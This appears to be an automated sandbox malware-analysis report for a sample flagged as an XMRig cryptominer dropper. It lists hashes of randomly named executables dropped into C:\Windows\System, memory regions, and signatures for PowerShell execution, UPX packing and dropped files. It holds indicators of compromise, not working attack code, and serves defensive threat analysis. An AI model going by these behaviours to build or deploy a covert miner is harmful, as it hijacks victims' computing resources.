SHA1 f2ea34aed4b37590565bd7a3024900392aeaf3a5
SHA256 3708e72880c0e54f83517a8143bb24b5a6eb97ba6eeb16d0b27bbf0714036064
SHA512 3a296877c76d821fc3ad0f704a65eaa9a19cbcb3d96ac24a97853ad524efc4101c4c0828a748229db590831f9fe1edffbebd138f461474213a3327cfeb727296

C:\Windows\System\gXVGHRh.exe

MD5 0b2e19455b054238162abaaf4e901442
SHA1 35ecdfe45ee0583bf9b7468a0ffa721dc7dccd9d
SHA256 e6ce5f1592e0363a9900e954838e74234c6972c78508c36147763e8bfe5c0ee9
SHA512 36ba2ab3ce9b0b67f3b7964051a5bfef77ced21ea5147d523762cbc91f14011116a5adc10c215bac21c4f83e837ecf286ba773645cb4f9f857157d09ff36d226

C:\Windows\System\piYVlmM.exe

MD5 4e9e4199cda508197360cd2874a9e28d
SHA1 b07b8052a1fd499ee02e6379ba5be2c70ace8e59
SHA256 3fca7ec08733334ff472252745ce3ef49cecfd173f595aad700774ad7866e3ce
SHA512 58bb3f7924fcd802f662ac40a6ff740d30ddb56fa0e4363f65c03bdb05448472bcd46ff47fdf5541d835fdccf1ec0643964ce94038682248c91317328c52033d

C:\Windows\System\QpTWwwq.exe

MD5 e0a8b478f6c48a7e1a7c0f639a98947c
SHA1 7a1e3903aff527eeba6a223b4e3102da5cdc72e1
SHA256 75bbe97c614a310e6dbd642fe9fa5a9b871d542476f885e7ef27ed55f28ba353
SHA512 e2ecf465e250ae15ed0e70c7d71421b5d2c4a46e7a5d0717d06d70e0ce8e3e4cc0688c539069e1f81b6e9204bb93d88995c5ba86be6b42c0736790dc38253d74

C:\Windows\System\vpMMLHE.exe

MD5 205759bccfafe8cce92870c2ef8af7ce
SHA1 e6d130ad829e485c3d94a40b85196e35f61601e4
SHA256 d822b56b6e400067eb28aa3f626b335d0f36fd031f09b51a1d2e0533e14d9c24
SHA512 fa25d6a117345e0b90d31e6613594583ab2e898579d2da79d229cb3fd9d7e4f83e648df53ee2b1a7b8c5ca704efe9122f137aad8a69b456d99475096bf737ae4

C:\Windows\System\VABdwRq.exe

MD5 4706ccf411ff4cc69c7c415e0e97dfcc
SHA1 b2be0be89837536d9e9cdbd1a21e71b6b44e9251
SHA256 35e20de3ac7b0af9e63afe3c3fdd1ce367cb3f84d24f354fa46d00a8fb0db954
SHA512 e401021abcda87dfe7e1e4d2dfd6a9f3397e39ae7b7bdbf610567a79392df8a8b1e99d2b41095934b287200df8cc189a84c0816fe01ca56d0df9a98ed7235d8a

C:\Windows\System\ClhmUqz.exe

MD5 41a50aa57b25f66a65c0b0819a51c84d
SHA1 9e030652f3f9bda1f42ab812307c9d70e4b311f7
SHA256 382110d2328e09afe32462d66a8fd6771adc79f3ac3763618633429f06583adf
SHA512 4ca207a81a3741be0b593f5809487b424ce76cbaf48890943381d0d9af446efe859df5b0cc815df34ec28ee4d4dbcef525dba38875654333673815ea98db9fbd

C:\Windows\System\lgTwpcz.exe

MD5 d19434c5a25942fb148a6e39edddb25e
SHA1 e98cea7e34e781e4988a7ecc28f96e585d234c1e
SHA256 7e71d994f02e07e4ac3cfd675533cb3e098f7fe13a9622e30c30c14566e1b14e
SHA512 f853fcaad3f2d05363c97c3d8a3194e03d8fafd8f0234004b99e0aeeaa9ebb167634a00491d9686bbf37dd5fab5690cba6f12c91a0c0c9db6d3c47562bd059d0

C:\Windows\System\knsVvIu.exe

MD5 da996f784c0235925f8af51dd30825dd
SHA1 47779fb23037798f0059208c1ede23df0fbae05c
SHA256 6cfbd4e208b40982b519ee8801edb18e19072ca38c0a4579ea857973ce687cfe
SHA512 cc76d8c197a3a74f0aeab7683ded33592c528fbddbb2c1680d04c0cfb3a254426afd4ba8735ebfdf833eeef5f999371ca6f89cca6e2a6c73a9aba8067eaac097

C:\Windows\System\XobMwfm.exe

MD5 7e53dc6bfdf66949f0381b031d4cc400
SHA1 a13a5f8760c25d054a2cf99d0686a8f1bb3923f4
SHA256 9e3327049d25560f7cd579fe1b28c38cc72195a72898c7b5adc4941ddf256467
SHA512 49373574252db2d7ca5e80576b39e0353a79b0a6802d1c77c8237a4f4cdf5f4ac3c4f8c3ed94519b8566ef2f71e3bf0e58d8ded2135dd826ef1f9d1ad83d44f8

C:\Windows\System\FlVLSxL.exe

MD5 cede315a6a1d3c8b2289dce1893fc180
SHA1 d27a8a518d34f8849e2e4c9d67d501467d48512b
SHA256 d1b6d285255e7e82b56fe6ee5d5df18f11544b876edd722ddf61ba0e14f52ec3
SHA512 f7e7109fea655cc97f556445efa649acb4ab44fe391bb490bab4e5469701bb3925f9e5bc86c5cd6330e511350876c98461adab8b0985100413607ac9f9c5af30

C:\Windows\System\cpNYghl.exe

MD5 26b88124961cdbccbd263722a75c7f3f
SHA1 7eab6fc6eee8909c1dfc606b575fbbbf4ab357b2
SHA256 60b30b825fe8923db1d99fda79c927d2531fb4dc35d13fceac29278699e4caca
SHA512 3cdbf9ec788eee336f5a603c9cddd20de80ff32ee8b4610442211896b3ed616458dbabd5be7d26e0bf16bed024f7cf06d3590eb82eb10d5464afe135fbf38cf2

C:\Windows\System\TyJwUgx.exe

MD5 af785fd25f9d629ba1505fc3d4dcc80c
SHA1 495f4d028bfb26cbb09dac42fd744c828fe41a01
SHA256 def466b8f206c44c9830c73379b8f7510729e2dd15b1fe5b95ff993310568b17
SHA512 87786b4a353f4413fd102283f8be3ceb20c92630039f7f84d7738fd71186284112fc08e7c1b5544973db403c89106494ebdf48a536f65353387f3103256a9ba9

C:\Windows\System\VNqvexl.exe

MD5 9e66e7aee96f3bbab87dd3cef31f9b9e
SHA1 5eba264f96c7bfcd340c8b383382e0546dac665a
SHA256 1899b9088c182dd6dc5d4f4077d9c56926f18ef6cd52339a92be1010bb8c6800
SHA512 93489f3d6b39be42dc892cef0ea1cdd7710705c3e8687fddb969c3e5374fcfcd9f0b1bd5830f8b118706331cc91d6b3a417cffaf58aedefd14b478859bea1c2a

C:\Windows\System\UxUdIos.exe

MD5 fa1c132224f5281c92cb68484c5ca276
SHA1 a9cbc395838cc49213f50d3739a6bde15d3721f7
SHA256 0b017d263311ab87e3104b95698116fd473d65694f2769c24b7c9990f59d240c
SHA512 f8b074612a5c0b87b99c150901e7f325d5902ecd9b82bfe838e4e712fbb6dd7c8775092843dd868dd35e42caf56d5fd85edf5ebbc7ea45dc2d82fc8471ad812d

memory/220-52-0x000001DFDFF70000-0x000001DFDFF92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cfvaqqev.ieh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\System\HxbAazS.exe

MD5 82ec4308f0fe2eff6037f0c9867fd3ac
SHA1 706fd89ae827da858be9835ef33609c957595374
SHA256 a6a04500da75dfb5027327f0e892a196316cfff892d5f3b7fc58d7f82c9d1367
SHA512 ac30e1e7d5ef2aded4e76f6fda03af110e45a5273c8fe733ca6ab84db7e7ba0a21548be3801d6c8989fd5d26a6ca33fd6af710933d25a9d4897e60af5ac029db

memory/556-33-0x00007FF6A6AA0000-0x00007FF6A6E96000-memory.dmp

memory/2952-14-0x00007FF7F8550000-0x00007FF7F8946000-memory.dmp

memory/1688-10-0x00007FF63C320000-0x00007FF63C716000-memory.dmp

memory/3660-797-0x00007FF61F140000-0x00007FF61F536000-memory.dmp

memory/3372-812-0x00007FF70A180000-0x00007FF70A576000-memory.dmp

memory/3300-802-0x00007FF72E6B0000-0x00007FF72EAA6000-memory.dmp

memory/2880-818-0x00007FF601150000-0x00007FF601546000-memory.dmp

memory/5060-823-0x00007FF7026D0000-0x00007FF702AC6000-memory.dmp

memory/2696-830-0x00007FF70BBD0000-0x00007FF70BFC6000-memory.dmp

memory/2184-837-0x00007FF7F51D0000-0x00007FF7F55C6000-memory.dmp

memory/1588-862-0x00007FF7A18C0000-0x00007FF7A1CB6000-memory.dmp

memory/3720-870-0x00007FF650720000-0x00007FF650B16000-memory.dmp

memory/1360-883-0x00007FF721B20000-0x00007FF721F16000-memory.dmp

memory/5044-887-0x00007FF650AA0000-0x00007FF650E96000-memory.dmp

memory/3768-892-0x00007FF78BF10000-0x00007FF78C306000-memory.dmp

memory/1904-888-0x00007FF69E4F0000-0x00007FF69E8E6000-memory.dmp

memory/2544-884-0x00007FF6FFF20000-0x00007FF700316000-memory.dmp

memory/1964-866-0x00007FF7D9810000-0x00007FF7D9C06000-memory.dmp

memory/3992-871-0x00007FF7BEC30000-0x00007FF7BF026000-memory.dmp

memory/2344-863-0x00007FF6A6070000-0x00007FF6A6466000-memory.dmp

memory/4064-854-0x00007FF667E30000-0x00007FF668226000-memory.dmp

memory/4924-851-0x00007FF683840000-0x00007FF683C36000-memory.dmp

memory/3404-847-0x00007FF724C60000-0x00007FF725056000-memory.dmp

C:\Windows\System\aDVLBJo.exe

MD5 67d893d1a2095d39d451d08ee1cc05e9
SHA1 dad7ef4487e41ff3c3e600250e691ed16832dc94
SHA256 cc871666e89dd430f5e3dc9cc361cd1a4ecf7214b4b8daeb86cca2257079f3ce
SHA512 7799e4db272ac6c136cb55f2e50c1582a5027767dc6d148dbf159fdb6f776a047cf2ac573fbb2f2ca5a994173cf0465c93ef3f6e6c86e8981136e854def9801d

memory/2952-1871-0x00007FF7F8550000-0x00007FF7F8946000-memory.dmp

memory/220-1872-0x00007FFF43280000-0x00007FFF43D41000-memory.dmp

memory/220-1873-0x00007FFF43283000-0x00007FFF43285000-memory.dmp

memory/220-1878-0x00007FFF43280000-0x00007FFF43D41000-memory.dmp

memory/1688-1879-0x00007FF63C320000-0x00007FF63C716000-memory.dmp

memory/4256-1880-0x00007FF6DAF30000-0x00007FF6DB326000-memory.dmp

memory/2952-1881-0x00007FF7F8550000-0x00007FF7F8946000-memory.dmp

memory/2544-1883-0x00007FF6FFF20000-0x00007FF700316000-memory.dmp

memory/556-1882-0x00007FF6A6AA0000-0x00007FF6A6E96000-memory.dmp

memory/5060-1886-0x00007FF7026D0000-0x00007FF702AC6000-memory.dmp

memory/2696-1892-0x00007FF70BBD0000-0x00007FF70BFC6000-memory.dmp

memory/3372-1891-0x00007FF70A180000-0x00007FF70A576000-memory.dmp

memory/3660-1890-0x00007FF61F140000-0x00007FF61F536000-memory.dmp

memory/2880-1889-0x00007FF601150000-0x00007FF601546000-memory.dmp

memory/3768-1888-0x00007FF78BF10000-0x00007FF78C306000-memory.dmp

memory/1904-1885-0x00007FF69E4F0000-0x00007FF69E8E6000-memory.dmp

memory/5044-1887-0x00007FF650AA0000-0x00007FF650E96000-memory.dmp

memory/3300-1884-0x00007FF72E6B0000-0x00007FF72EAA6000-memory.dmp

memory/1964-1902-0x00007FF7D9810000-0x00007FF7D9C06000-memory.dmp

memory/1588-1901-0x00007FF7A18C0000-0x00007FF7A1CB6000-memory.dmp

memory/4064-1900-0x00007FF667E30000-0x00007FF668226000-memory.dmp

memory/4924-1899-0x00007FF683840000-0x00007FF683C36000-memory.dmp

memory/3720-1897-0x00007FF650720000-0x00007FF650B16000-memory.dmp

memory/3992-1896-0x00007FF7BEC30000-0x00007FF7BF026000-memory.dmp

memory/1360-1895-0x00007FF721B20000-0x00007FF721F16000-memory.dmp

memory/2344-1898-0x00007FF6A6070000-0x00007FF6A6466000-memory.dmp

memory/2184-1893-0x00007FF7F51D0000-0x00007FF7F55C6000-memory.dmp

memory/3404-1894-0x00007FF724C60000-0x00007FF725056000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 07:24

Reported

2024-06-12 07:27

Platform

win7-20240611-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\rsaqHtl.exe N/A
N/A N/A C:\Windows\System\FDLFJfA.exe N/A
N/A N/A C:\Windows\System\CuuMPLw.exe N/A
N/A N/A C:\Windows\System\HEmcQsX.exe N/A
N/A N/A C:\Windows\System\qgOQVxV.exe N/A
N/A N/A C:\Windows\System\veogiwJ.exe N/A
N/A N/A C:\Windows\System\FyVDcbd.exe N/A
N/A N/A C:\Windows\System\HmgDmmO.exe N/A
N/A N/A C:\Windows\System\PdEiZfn.exe N/A
N/A N/A C:\Windows\System\oRximgK.exe N/A
N/A N/A C:\Windows\System\ZtFfVLF.exe N/A
N/A N/A C:\Windows\System\AXovjEj.exe N/A
N/A N/A C:\Windows\System\Ueqblbk.exe N/A
N/A N/A C:\Windows\System\CTyTPAX.exe N/A
N/A N/A C:\Windows\System\gShbcXR.exe N/A
N/A N/A C:\Windows\System\eJvTilp.exe N/A
N/A N/A C:\Windows\System\ritVNfB.exe N/A
N/A N/A C:\Windows\System\qGHEQog.exe N/A
N/A N/A C:\Windows\System\IbXSfvt.exe N/A
N/A N/A C:\Windows\System\JTWrtFp.exe N/A
N/A N/A C:\Windows\System\OWcIGNe.exe N/A
N/A N/A C:\Windows\System\vbEAZlR.exe N/A
N/A N/A C:\Windows\System\FcFEQuq.exe N/A
N/A N/A C:\Windows\System\EHUwXix.exe N/A
N/A N/A C:\Windows\System\AAjpnXI.exe N/A
N/A N/A C:\Windows\System\sfgWhNp.exe N/A
N/A N/A C:\Windows\System\Buzjupm.exe N/A
N/A N/A C:\Windows\System\fLdZRfj.exe N/A
N/A N/A C:\Windows\System\fMYSmqT.exe N/A
N/A N/A C:\Windows\System\plqsgBC.exe N/A
N/A N/A C:\Windows\System\amWkTNr.exe N/A
N/A N/A C:\Windows\System\IvKtifA.exe N/A
N/A N/A C:\Windows\System\kFLapLH.exe N/A
N/A N/A C:\Windows\System\wTknWCV.exe N/A
N/A N/A C:\Windows\System\UXBmnFy.exe N/A
N/A N/A C:\Windows\System\OHjcwTd.exe N/A
N/A N/A C:\Windows\System\mUMZYou.exe N/A
N/A N/A C:\Windows\System\xfPBgbv.exe N/A
N/A N/A C:\Windows\System\qbBVwiK.exe N/A
N/A N/A C:\Windows\System\habowhw.exe N/A
N/A N/A C:\Windows\System\IlNRuAV.exe N/A
N/A N/A C:\Windows\System\cEKRQnQ.exe N/A
N/A N/A C:\Windows\System\RQEmYEN.exe N/A
N/A N/A C:\Windows\System\mMyYmyk.exe N/A
N/A N/A C:\Windows\System\aTgRNRL.exe N/A
N/A N/A C:\Windows\System\SpGaijO.exe N/A
N/A N/A C:\Windows\System\xnqIxUQ.exe N/A
N/A N/A C:\Windows\System\IDtXrbS.exe N/A
N/A N/A C:\Windows\System\NteQZSL.exe N/A
N/A N/A C:\Windows\System\sdpFOBu.exe N/A
N/A N/A C:\Windows\System\trIlcIh.exe N/A
N/A N/A C:\Windows\System\qzmKmAh.exe N/A
N/A N/A C:\Windows\System\IKOPUhv.exe N/A
N/A N/A C:\Windows\System\sSOTbIk.exe N/A
N/A N/A C:\Windows\System\JHOxBre.exe N/A
N/A N/A C:\Windows\System\zswsRPM.exe N/A
N/A N/A C:\Windows\System\rHSKgGq.exe N/A
N/A N/A C:\Windows\System\GOZtNGo.exe N/A
N/A N/A C:\Windows\System\igBpKVZ.exe N/A
N/A N/A C:\Windows\System\sobJxBP.exe N/A
N/A N/A C:\Windows\System\CfGlpZU.exe N/A
N/A N/A C:\Windows\System\qqTJqNG.exe N/A
N/A N/A C:\Windows\System\fXngNNA.exe N/A
N/A N/A C:\Windows\System\NRVqXXT.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\eDCAZYj.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\IbXSfvt.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\dmBGwzc.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\PucPrkR.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\tUbunMo.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\rVgvpLl.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZpqpxYD.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZtODYlL.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\XjxfWmi.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\IzEiWPL.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\sYsqjYw.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\lbAhPrY.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\ryGACFu.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\sNpVrPC.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
